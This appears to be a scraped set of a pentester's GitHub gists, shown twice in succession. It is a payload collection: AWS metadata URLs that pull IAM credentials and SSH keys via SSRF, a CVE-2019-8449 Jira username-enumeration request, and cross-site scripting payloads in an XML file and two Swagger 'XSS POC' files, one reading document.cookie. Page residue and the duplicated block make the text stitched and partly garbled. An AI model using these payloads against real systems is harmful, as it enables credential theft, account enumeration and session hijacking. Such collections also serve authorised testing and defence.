Locu xlocux

## cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

## Jira bug-exploit


cve-2019-8449
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
 https://jira.atlassian.com/browse/JRASERVER-69796
 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
=====================================================================================================================================

## regions.xml
<?xml version="1.0" encoding="windows-1252"?>
<regions mapColor="0xDDDDDD" inertColor="0x333333">
	<america name="Americas" activeColor="0x45c4ef" link="http://bio.locu.uk">
	<language name="North America - English" link="http://bio.locu.uk"/>
	<language name="Amérique du Nord - Français" link="http://bio.locu.uk"/>
	<language name="América del Norte - Español" link="http://bio.locu.uk"/>
	<language name=" -------" link=""/>
	<language name="Latinoamérica - Español" link="javascript:alert(1)"/>
	<language name="Latin America - English" link="alert(1)"/>
	</america>

## GITHUB_TOKEN checker
#requirement: pip install PyGithub


from github import Github

token = 'your_github_token'

g = Github(token)
user = g.get_user()

## xss.svg

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                xlocux
                / xss.svg
            
            
              Created
              August 10, 2019 11:24
            
          
      Loading

      Sorry, something went wrong. Reload?
      Sorry, we cannot display this file.
      Sorry, this file is invalid so it cannot be displayed.
      
          Viewer requires iframe.
      
    
## swagger-xss3.json
{
  "swagger": "2.0",
  "info": {
    "version": "0.0.1",
    "title": "Example Title",
    "description": "<img src=x onerror=\"alert(document.domain)\">",
    "termsOfService": "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
  },
  "paths": {
    "/": {

## swagger.json
{
  "swagger": "2.0",
  "info": {
    "version": "1.0.0",
      "title": "XSS POC by Locu",
    "description": "<script>alert(document.domain)</script>",
    "termsOfService": "javascript:alert(document.cookie)"
  },
  "paths": {
    "/": {
	## AWS
	# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

	http://169.254.169.254/latest/user-data
	http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
	http://169.254.169.254/latest/meta-data/ami-id
	http://169.254.169.254/latest/meta-data/reservation-id
	http://169.254.169.254/latest/meta-data/hostname
	http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key





	cve-2019-8449
	The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability.
	https://jira.atlassian.com/browse/JRASERVER-69796
	https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
	=====================================================================================================================================
	<?xml version="1.0" encoding="windows-1252"?>
	<regions mapColor="0xDDDDDD" inertColor="0x333333">
	<america name="Americas" activeColor="0x45c4ef" link="http://bio.locu.uk">
	<language name="North America - English" link="http://bio.locu.uk"/>
	<language name="Amérique du Nord - Français" link="http://bio.locu.uk"/>
	<language name="América del Norte - Español" link="http://bio.locu.uk"/>
	<language name=" -------" link=""/>
	<language name="Latinoamérica - Español" link="javascript:alert(1)"/>
	<language name="Latin America - English" link="alert(1)"/>
	</america>
	#requirement: pip install PyGithub


	from github import Github

	token = 'your_github_token'

	g = Github(token)
	user = g.get_user()
	{
	"swagger": "2.0",
	"info": {
	"version": "0.0.1",
	"title": "Example Title",
	"description": "<img src=x onerror=\"alert(document.domain)\">",
	"termsOfService": "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
	},
	"paths": {
	"/": {
	{
	"swagger": "2.0",
	"info": {
	"version": "1.0.0",
	"title": "XSS POC by Locu",
	"description": "<script>alert(document.domain)</script>",
	"termsOfService": "javascript:alert(document.cookie)"
	},
	"paths": {
	"/": {